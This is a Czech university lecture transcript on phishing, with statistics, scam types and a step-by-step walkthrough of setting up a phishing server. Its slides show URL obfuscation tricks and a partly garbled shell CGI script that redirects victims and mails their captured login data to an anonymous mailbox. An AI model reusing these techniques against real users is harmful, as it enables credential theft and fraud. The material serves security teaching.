Počítačové viry a bezpečnost počítačových systémů. Phishing

Rozměr: px
Začít zobrazení ze stránky:

Download "Počítačové viry a bezpečnost počítačových systémů. Phishing"

Transkript

1 ! Počítačové viry a bezpečnost počítačových systémů Phishing prof. Ing. Ivan Zelinka, Ph.D. Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba Czech Republic! Phone: GSM: prof. Ing. Ivan Zelinka, Ph.D.

2 Schéma přednášky

3 Schéma přednášky

4 Pishing V roce 2004 byly téměř 2 miliony občanů USA vystaveny útoku virtuálních zločinců Celkové ztráty dosáhly téměř 2 miliard dolarů phishingové ů stoupá (např. v r během 6. měsících o procent Podle společnosti Symantec, poskytovatele antispamové technologie, tvořil spam 63 procenta ze 2,93 miliardy ů zachycených softwarem společnosti Brightmail AntiSpam V polovině července roku 2004 zablokovaly filtry firmy Brightmail AntiSpam 9 milionů pokusů o phishing týdně. Tento počet v prosinci 2004 přesáhl 33 miliony zablokovaných zpráv týdně

5 Pishing průběhu 24 hodin v březnu 2005 bylo 10 z 12 ů oficiálně zařazeno jako spam a každá 82. zpráva v sobě skrývala virus Pokud alespoň 1 ze příjemců skutečně zareaguje na pobídku Klepněte sem", která se objevuje ve spamech, mají spammeři dostatečný finanční stimul k tomu, aby rozeslali dalších 5 milionů spamových zpráv Phishing představuje podskupinu kategorie spamu. Mezi hlavní identifikační rysy patří: nástroj pro hromadnou poštu a jeho vlastnosti zvyky v oblasti odesílání pošty včetně konkrétních stylů a rozvrhů, ale nejen jich druh systému používaného pro rozesílání spamu (v počítači, kde se y vytvářejí) druh systému používaného pro umístění phishingového serveru v struktura nepřátelského phishingového serveru včetně využívání HTML, JS, PHP a jiných skriptů

6 Pishing

7 Spam - pishing Nevyžádaná obchodní elektronická pošta (UCE) Neodpovídající obchodní elektronická pošta (NCE) Producenti seznamů Samy Scamy tvoří největší část spamu. Jejich účelem je získání významných finančních prostředků prostřednictvím oklamání uživatelů. Mezi podskupiny scamu patří 419 (scam nigerijského typu), malware a phishing.

8 Pishing Podle Internet Storm Center vydrží čistá schránka pod Windows bez jakékoli záplaty na Internetu odolávat průměrně 20 minut Pishing je definován jako primitivní metoda, jako způsob odeslání falšovaného upříjemci, který klamavým způsobem napodobuje legální instituci s úmyslem vyzvědět od příjemce důvěrné informace jako číslo platební karty nebo heslo k bankovnímu účtu. Takový většinou navádí uživatele, aby navštívil nějaké webové stránky a zadal zde tyto důvěrné informace. Tyto stránky mají design podobný jako instituce, za kterou se scammer vydává, aby získal vaši důvěru. Stránky této instituci samozřejmě nepatří a výsledkem je ukradení vašich důvěrných údajů za účelem finančního zisku. Proto je slovo phishing evidentně variací na slovo fishing (rybaření), kde scammer nakazuje háčky" v naději, že se do nich pár jeho obětí zakousne".

9 Pishing Příklad : matení oka Jednoduchým příkladem je Webový prohlížeč přečte pravou stranu adresy a přejde na Google. v prohlížeči většinou indikuje uživatelské jméno a heslo, podobně jako u FTP. V případě, že se nezadá, je bezvýznamný. FTP přihlášení ve webovém prohlížeči může vypadat nějak takhle: Aby to phisher ještě více zkomplikoval, zmate URL jeho nečitelným zakódováním. To lze provést mnoha způsoby. Nejdříve vyhledáme IP adresu pro Google, která je např Dále konvertujme řetězec do DWord (Double Word). Word je normální počet bitů, který je vyhovující pro provádění operací u konkrétní architektury. U architektury Intel je tímto počtem 16 bitů, takže Double Word bude 32 bitů a uvádí se v desetinné podobě. Matematicky se konverze IP adresy do DWord provede takto: (216* )*(256+57)*( ) = , čímž nás dostane na google.com

10 Pishing Lze zadat 56456/ a jsme na google.com Dále to lze ještě více zkomplikovat, šestnáctkový kód je 40. V případě URL se pro indikaci šestnáctkového kódu použije předpona %. Pakdostaneme

11 Co není phish Scam typu Nigerian 419 Tento scam, známý také jako advanced fee fraud, podvod typu vymáhání zálohového poplatku nebo také scam Ponzi, mezi nás přišel ještě před začátkem 80. let. Přichází ve formě faxu, dopisu nebo u. Podvodná internetová aukce Tyto scamy čítají až 64 % veškerých internetových podvodů a jsou hlavním druhem podvodu používaného na internetu (Internet Fraud Complaint Center,

12 Phish statistika Na Jednu hromadnou zásilku čítající ů přijme až 10 % příjemců a vynese okolo 1 % obětí. Phishers našli využití pro každý účet, který získají: od praní špinavých peněz k odcizení, podvodům a krádežím identity. Phishers zdokonalují svoje metody v oblasti key-loggingového malwaru (zaznamenávání stisku kláves). Místo sběru dat ze všech webových stránek vyhledávají data z jednotlivých URL a využívají i faktor botnetu a vyzbrojují se sami pomocí distribuovaných serverů po celém světě. Trojské koně jako Trojan.BankAsh nakazí soubory hostitelského počítače a berou si je na nepravé bankovní weby za účelem ukradení dat jejich uživatelů. Phishers využívají zranitelnost v rámci Cross-Site Scripting2 (XSS), možnosti přesměrování URL a jakékoli způsoby vykořisťování spojené s prohlížeči, které jim umožní provádět útoky za účelem získání informací o uživatelích.

13 Phish statistika Běžná metoda odhadu velikosti hromadné zásilky potřebuje využít shromážděné ové adresy: Vytvořte skupinu ových adres, které budete využívat pouze pro potřeby spamu. Obecně se jí říká spamový účet typu honeypot (úmyslně nezabezpečený systém, který umožňuje monitorovat podezřelou aktivitu). Provedte distribuci těchto ových adres do nižných míst. Tento proces se nazývá rozsévání, protože adresy z honeypotu se sází" do různých fór. Vyčkejte, dokud účty nezačnou přijímat spamy. Může to trvat hodiny i měsíce, podle daného fóra. phishing představuje 0,5 % veškerého spamu, nebo zhruba 25 milionů ů každý den.

14 Phish statistika úspěšnosti phishingu: téměř 50 % možných obětí - lidí, kteří klepnou na odkaz v u - se objeví během prvních 24 hodin po odeslání hromadné pošty v téměř 50 % možných obětí se objeví během dalších 24 hodin po odeslání hromadné pošty méně než 1 procento možných obětí vstoupí na stránku po 48 hodinách Phishingové servery, které se uzavřou během 24 hodin, mohou omezit míru návratnosti na polovinu. Naopak phishingové servery, které se neodstaví do 48 hodin, se vystavují 50% riziku, že budou během následujícího měsíce použity pro jiný phishingový útok. Doba mezi opětovným použitím se mění podle phishingových skupin - některé skupiny používají servery okamžitě znovu, jiné čekají s návratem týdny.

15 Phish statistika S během první hodiny po odeslání hromadné pošty může být až 20 % přístupů na phishingový server ze strany antiphishingových organizací. V logu to lze najít podle typu prohlížeče (wget je zřejmá indikace antiphishingové organizace) a IP adresy. Především IP adresa může vést ke známé antiphishingové skupině. V téměř 80 procent antiphishingových skupin, které na server vstoupí, tak činí během prvních 12 hodin. Po 48 hodinách patří téměř všechny přístupy antiphishingovým skupinám. Jsou to pravděpodobně skupiny, které ověřují, zda je server stále aktivní.

16 Falešná identita - zrcadlo V tomto kroku se pomocí SW robota provede stažení vybrané webové stránky. Povšimněte si souboru robots.txt, který slouží k zamezení přístupu robotů k vybraným částem stránek. Platí pouze pro roboty splňující normu RES-Robot Exclusion Standard.

17 Obsah souboru robot.txt může být například: Falešná identita - zrcadlo

18 Falešná identita - nastavení pishingového serveru

19 Falešná identita - založení anonymní schránky Všimli jste si, že jediný nepropojený odkaz vede na cgi/login.cgi? Je to náš hlavní cíl, protože zpracovává důvěrné přihlašovací údaje pro celou stránku. Nemáme přístup ke kódu cílové stránky pro Login.cgi, takže si vybudujeme svůj vlastní. Tento modifikovaný soubor Login.cgi provede dvě hlavní akce: zaznamená přihlašovací údaje, odešle je do naší anonymní schránky a zároveň odešle MITM POST zpátky na stránku s uživatelskými údaji a v zásadě se přihlásí místo něj. Tato technika MITM byla užita phishery, kteří se zaměřili na PayPal, je to diskrétní způsob, jak podfouknout oběť, aniž by si byla něčeho vědoma, jelikož jsme napojeni zpět na skutečný cíl a uživatel bude přihlášen.

20 Falešná identita - založení anonymní schránky #!/bin/sh PATH=/bin:/usr/bin:/usr/local/bin RSERVER=bank.securescience.net/bank URI='echo "${REQUEST_URI}" sed-e # Give CGI header and start web page echo "Status: 301 Moved Content- Type: text/html Location: <html> <body> This page has moved to <a href=\"http://${rserver}${uri}\">http://${rserver}${request JJRI}</a> </body> </html>" Tento kód vezme URI z REQUEST_URI a odstraní vše až k /cgi/(za předpokladu, že /cgi/ je obsaženo v URÍ) a předává výsledky do URI.

21 Falešná identita - založení anonymní schránky pro zachycení dat použijeme ovou adresu jako naši anonymní schránku, pro ukázku použijme POSTDATA='echo "${URI}" sed -e ' s/\/cgi\/login.cgi?//'' cat «! /usr/lib/sendmail -t From: ${SENDER} To: ${RECIPIENT} ${POSTDATA}!

22 Falešná identita - příprava phishingového u

23 Útok přesměrováním Pro phishingovou techniku přesměrování je standardním postupem sběr dat a přesměrování oběti na skutečnou stránku. Jedná se o jeden ze sofistikovanějších způsobů phishingového útoku, jelikož neexistuje žádná sběrná webová stránka, žádné obrázky a na jediném použitém serveru běží jen přesměrovací skript. Uživatel je vyzván k zadání svých přihlašovacích informací přímo do ové zprávy. Tento způsob phishingu je velmi populární na ebay, PayPal a elektronických obchodech jako např. Amazon. Od takových společností mnohem pravděpodobněji obdržíte ohledně výhod a nově nabízených služeb, takže napodobení postupu, který je pohodlnější pro zákazníky elektronických obchodů, je pochopitelné.

OFICIÁLNÍ WWW PREZENTACE OBCE JÍLOVICE BEZPEČNOSTNÍ ASPEKTY INTERNETU JIHOČESKÁ UNIVERZITA PEDAGOGICKÁ FAKULTA RADEK FILIP KATEDRA INFORMATIKY

OFICIÁLNÍ WWW PREZENTACE OBCE JÍLOVICE BEZPEČNOSTNÍ ASPEKTY INTERNETU JIHOČESKÁ UNIVERZITA PEDAGOGICKÁ FAKULTA RADEK FILIP KATEDRA INFORMATIKY JIHOČESKÁ UNIVERZITA PEDAGOGICKÁ FAKULTA KATEDRA INFORMATIKY OFICIÁLNÍ WWW PREZENTACE OBCE JÍLOVICE BEZPEČNOSTNÍ ASPEKTY INTERNETU BAKALÁŘSKÁ PRÁCE RADEK FILIP ČESKÉ BUDĚJOVICE 2003 Anotace: Tato práce

Více

Úvod. Nejnovější pokyny pro zabezpečení. Osobní údaje. Internetové bankovnictví ING Online

Úvod. Nejnovější pokyny pro zabezpečení. Osobní údaje. Internetové bankovnictví ING Online Úvod Vítejte v části internetových stránek věnované zabezpečení. Tato část Vám poskytne odpovědi na otázky, které si kladete v souvislosti s bezpečností při využívání internetového bankovnictví. Obsahuje

Více

Bezpečnost dat v informatice Data Security in Computer Science. Jan Hraňo

Bezpečnost dat v informatice Data Security in Computer Science. Jan Hraňo Bezpečnost dat v informatice Data Security in Computer Science Jan Hraňo Bakalářská práce 2014 UTB ve Zlíně, Fakulta aplikované informatiky, 2014 4 ABSTRAKT Tato bakalářská práce se zaobírá především

Více

6 Bezpečnost online systémů a platebních systémů

6 Bezpečnost online systémů a platebních systémů 6 Bezpečnost online systémů a platebních systémů Cíle výuky modulu Popsat klíčové aspekty bezpečnosti e-commerce Identifikovat klíčové bezpečnostní hrozby v prostředí e-commerce. Popsat, jak technologie

Více

Regulace spamu v rámci EU

Regulace spamu v rámci EU Vysoká škola ekonomická v Praze Fakulta informatiky a statistiky Vyšší odborná škola informačních služeb v Praze Petr Vaněk Regulace spamu v rámci EU Bakalářská práce 2010 Prohlášení Prohlašuji, že jsem

Více

IBM Security Trusteer Rapport. Uživatelská příručka

IBM Security Trusteer Rapport. Uživatelská příručka IBM Security Trusteer Rapport Uživatelská příručka Verze 3.5.1403 Srpen 2014 Poznámky Tyto informace platí pro produkty a služby nabízené v USA. IBM nemusí v ostatních zemích nabízet produkty, služby a

Více

Bezpečnostní řešení IT společnosti. Libor Housírek

Bezpečnostní řešení IT společnosti. Libor Housírek Bezpečnostní řešení IT společnosti Libor Housírek Bakalářská práce 2006 ABSTRAKT Cílem této práce je základní seznámení s použitím a využitím bezpečnostních informačních technologií jako základního prostředku

Více

Implementační manuál PayU pro e-shopy

Implementační manuál PayU pro e-shopy 2.2 Implementační manuál PayU pro e-shopy s využitím šablony www.payu.cz Obsah 1. Úvod 2. Od registrace po spuštění PayU 2.1 Obecné informace 2.2 Popis jednotlivých kroků 3. Implementace PayU 3.1 Obecné

Více

KVALITATIVNÍ KOMPARACE INTERNETOVÉHO BANKOVNICTVÍ VYBRANÝCH BANK

KVALITATIVNÍ KOMPARACE INTERNETOVÉHO BANKOVNICTVÍ VYBRANÝCH BANK SOUKROMÁ VYSOKÁ ŠKOLA EKONOMICKÁ ZNOJMO s.r.o. Bakalářský studijní program: Ekonomika a management Studijní obor: Účetnictví a finanční řízení podniku KVALITATIVNÍ KOMPARACE INTERNETOVÉHO BANKOVNICTVÍ

Více

petr.novak@seznam.cz

petr.novak@seznam.cz Elektronická pošta a schránka E-mail aneb internetová komunik@ce V předchozích částech kurzu byl internet představen jako významná informační superdálnice. Internet ale velmi výrazně slouží pro komunikaci,

Více

VYSOKÉ UČENÍ TECHNICKÉ V BRNĚ

VYSOKÉ UČENÍ TECHNICKÉ V BRNĚ VYSOKÉ UČENÍ TECHNICKÉ V BRNĚ BRNO UNIVERSITY OF TECHNOLOGY FAKULTA ELEKTROTECHNIKY A KOMUNIKAČNÍCH TECHNOLOGIÍ ÚSTAV TELEKOMUNIKACÍ FACULTY OF ELECTRICAL ENGINEERING AND COMMUNICATION DEPARTMENT OF TELECOMMUNICATIONS

Více

Online platební systémy v České Republice a výběr vhodné varianty pro internetový obchod

Online platební systémy v České Republice a výběr vhodné varianty pro internetový obchod VYSOKÁ ŠKOLA EKONOMICKÁ V PRAZE Fakulta informatiky a statistiky Vyšší odborná škola informačních služeb v Praze Online platební systémy v České Republice a výběr vhodné varianty pro internetový obchod

Více

Ochrana a bezpečnost dat a informací

Ochrana a bezpečnost dat a informací Bankovní institut vysoká škola Praha Katedra informačních technologií Ochrana a bezpečnost dat a informací Bakalářská práce Autor: Petr Tesař Informační technologie, správce IS Vedoucí práce: Ing. Vladimír

Více

OPTIMALIZACE WEBOVÝCH STRÁNEK PRO VYHLEDÁVAČE S VYUŢITÍM METOD SEO A SEM

OPTIMALIZACE WEBOVÝCH STRÁNEK PRO VYHLEDÁVAČE S VYUŢITÍM METOD SEO A SEM SOUKROMÁ VYSOKÁ ŠKOLA EKONOMICKÁ ZNOJMO s.r.o. Bakalářský studijní program: Ekonomika a management Studijní obor: Účetnictví a finanční řízení podniku OPTIMALIZACE WEBOVÝCH STRÁNEK PRO VYHLEDÁVAČE S VYUŢITÍM

Více

1. LEKCE: Základní seznámení s PC, Windows a prohlížeči, tipy a triky. 2. LEKCE: Vyhledávání na Internetu, stahování dat a e-mailová komunikace

1. LEKCE: Základní seznámení s PC, Windows a prohlížeči, tipy a triky. 2. LEKCE: Vyhledávání na Internetu, stahování dat a e-mailová komunikace 1 2 Obsah 1. LEKCE: Základní seznámení s PC, Windows a prohlížeči, tipy a triky 2. LEKCE: Vyhledávání na Internetu, stahování dat a e-mailová komunikace 3. LEKCE: Nakupujeme bezpečně na Internetu 4. LEKCE:

Více

VZDĚLÁVACÍ CENTRUM TURNOV. Učíme se pro život. Základní počítačové znalosti a rozvoj digitálních kompetencí

VZDĚLÁVACÍ CENTRUM TURNOV. Učíme se pro život. Základní počítačové znalosti a rozvoj digitálních kompetencí VZDĚLÁVACÍ CENTRUM TURNOV Učíme se pro život Základní počítačové znalosti a rozvoj digitálních kompetencí Ing. Jana Červová RADIMOVICE 01-02 2015 I. 6.1. Základní ovládání počítače a. Počítač, Monitor,

Více

4.3.3 Systémy fungující na principu platebních karet... 40 4.3.3.1 Pay MUZO... 40 4.3.3.2 Platby kartou na Internetu od České spořitelny...43 4.

4.3.3 Systémy fungující na principu platebních karet... 40 4.3.3.1 Pay MUZO... 40 4.3.3.2 Platby kartou na Internetu od České spořitelny...43 4. Obsah 1 Úvod... 4 1.1 Cíle práce... 4 1.2 Přínosy práce...5 1.3 Struktura práce...5 2 Historie... 7 2.1 Cíle kapitoly...7 2.2 Stručná historie platebních systémů...7 3 Rozdělení platebních systémů... 10

Více

UNIVERZITA PARDUBICE. Fakulta elektrotechniky a informatiky. Elektronická pošta, její zabezpečení a ochrana proti spamu Michal Kašpar

UNIVERZITA PARDUBICE. Fakulta elektrotechniky a informatiky. Elektronická pošta, její zabezpečení a ochrana proti spamu Michal Kašpar UNIVERZITA PARDUBICE Fakulta elektrotechniky a informatiky Elektronická pošta, její zabezpečení a ochrana proti spamu Michal Kašpar Bakalářská práce 2012 Prohlášení autora Prohlašuji, že jsem tuto práci

Více

ESET NOD32 ANTIVIRUS 8

ESET NOD32 ANTIVIRUS 8 ESET NOD32 ANTIVIRUS 8 Uživatelská příručka (platná pro produkty verze 8.0 a vyšší) Microsoft Windows 8.1 / 8 / 7 / Vista / XP / Home Server 2003 / Home Server 2011 Klikněte sem pro stažení nejnovější

Více

Základní dělení. 3. červi

Základní dělení. 3. červi Počítačová infiltrace jakýkoliv neoprávněný vstup do počítačového systému dále uváděné typy počítačové infiltrace lze označit i názvem MALWARE MALicious software, škodlivý software Základní dělení 1. viry

Více

Aplikace pro obchodování na internetu

Aplikace pro obchodování na internetu MASARYKOVA UNIVERZITA Fakulta informatiky BAKALÁŘSKÁ PRÁCE Aplikace pro obchodování na internetu Amir Džaferagič BRNO 2008 PROHLÁŠENÍ Prohlašuji, že jsem tuto bakalářskou práci vypracoval samostatně. Všechny

Více

Západočeská univerzita v Plzni Fakulta pedagogická. Bakalářská práce SOFTWAROVÉ ZABEZPEČENÍ OSOBNÍHO POČÍTAČE V SYSTÉMECH WINDOWS.

Západočeská univerzita v Plzni Fakulta pedagogická. Bakalářská práce SOFTWAROVÉ ZABEZPEČENÍ OSOBNÍHO POČÍTAČE V SYSTÉMECH WINDOWS. Západočeská univerzita v Plzni Fakulta pedagogická Bakalářská práce SOFTWAROVÉ ZABEZPEČENÍ OSOBNÍHO POČÍTAČE V SYSTÉMECH WINDOWS Veronika Staňková Plzeň 2012 Prohlašuji, že jsem práci vypracovala samostatně

Více

Bezpečnost e-shopových frameworků. Bc. Filip Hasík

Bezpečnost e-shopových frameworků. Bc. Filip Hasík Bezpečnost e-shopových frameworků Bc. Filip Hasík Diplomová práce 2014 ABSTRAKT Cílem této diplomové práce je popsat problematiku e-shopových frameworků a jejich odolnost vůči bezpečnostním zranitelnostem.

Více

Průzkum využití prostředků obrany proti spamu

Průzkum využití prostředků obrany proti spamu Průzkum využití prostředků obrany proti spamu Součástí mé diplomové práce byl návrh metodiky pro obranu proti spamu, zaměřené zejména na výběr vhodných protiopatření. Jako jedno z východisek pro vytvoření

Více

Bezpečnost, ochrana dat a autorských práv

Bezpečnost, ochrana dat a autorských práv Kapitola sedmá Bezpečnost, ochrana dat a autorských práv Mgr. Radek Hoszowski Učební text Bezpečnost, ochrana dat a autorských práv Bezpečnost počítače Za bezpečný počítač považujeme ten počítač, který

Více

OBCHODOVÁNÍ NA INTERNETU, BANKOVNÍ SLUŽBY, ELEKTRONICKÁ CERTIFIKACE, DIGITÁLNÍ PODPISY A DALŠÍ NOVÉ TRENDY ICT

OBCHODOVÁNÍ NA INTERNETU, BANKOVNÍ SLUŽBY, ELEKTRONICKÁ CERTIFIKACE, DIGITÁLNÍ PODPISY A DALŠÍ NOVÉ TRENDY ICT OBCHODOVÁNÍNA INTERNETU,BANKOVNÍSLUŽBY, ELEKTRONICKÁ CERTIFIKACE,DIGITÁLNÍPODPISY A DALŠÍNOVÉTRENDYICT OBCHODOVÁNÍ NA INTERNETU, BANKOVNÍ SLUŽBY, ELEKTRONICKÁ CERTIFIKACE, DIGITÁLNÍ PODPISY A DALŠÍ NOVÉ

Více

Elektronické bankovnictví a jeho bezpečnost

Elektronické bankovnictví a jeho bezpečnost Bankovní institut vysoká škola Praha Katedra finančnictví a ekonomických disciplín Elektronické bankovnictví a jeho bezpečnost Bakalářská práce Autor: Veronika Haklová Finance Vedoucí práce: Mgr. Ing.

Více

Bezpečnostní informatika 1

Bezpečnostní informatika 1 VŠB - Technická univerzita Ostrava, Fakulta bezpečnostního inženýrství doc. Ing. Pavel Šenovský, Ph.D. Bezpečnostní informatika 1 skripta Ostrava, 2015 Bezpečnostní informatika 1 7. rozšířené vydání tento

Více

Zpracovali: Petr Heideker Petr Labašta Josef Frnka Pavel Kunert Daniel Remta

Zpracovali: Petr Heideker Petr Labašta Josef Frnka Pavel Kunert Daniel Remta Jak na Facebook 0 Zpracovali: Petr Heideker Petr Labašta Josef Frnka Pavel Kunert Daniel Remta Ke zhlédnutí je možné využít elektronickou verzi na adrese: http://jak-na-fb.g6.cz/ 1 Obsah 1. Úvod do sociálních

Více

Přehled soudobých hrozeb počítačové bezpečnosti

Přehled soudobých hrozeb počítačové bezpečnosti 21. Klasifikace bezpečnostních hrozeb pro počítače, možnosti ochrany PC. Etické zásady a právní normy související s informatikou (autorské právo, správné citace, typy licencí počítačových programů). Problematika

Více